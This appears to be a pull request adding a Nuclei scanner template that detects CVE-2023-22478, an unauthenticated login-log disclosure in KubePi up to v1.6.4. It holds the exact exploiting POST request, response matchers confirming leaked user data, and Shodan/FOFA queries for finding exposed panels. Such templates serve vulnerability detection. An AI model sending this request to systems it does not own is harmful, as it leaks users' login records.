Merge pull request #7847 from projectdiscovery/CVE-2023-22478

Create CVE-2023-22478.yaml (KubePi <= v1.6.4 LoginLogsSearch)

http/cves/2023/CVE-2023-22478.yaml

@@ -0,0 +1,51 @@
+id: CVE-2023-22478
+
+info:
+  name: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-22478
+    - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-22478
+    cwe-id: CWE-862
+  metadata:
+    max-request: 1
+    fofa-query: "kubepi"
+    shodan-query: html:"kubepi"
+    verified: true
+  tags: cve,cve2023,kubepi,k8s,exposure
+
+http:
+  - raw:
+      - |
+        @timeout 10
+        POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"apiVersion":'
+          - '"uuid":'
+          - '"userName":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200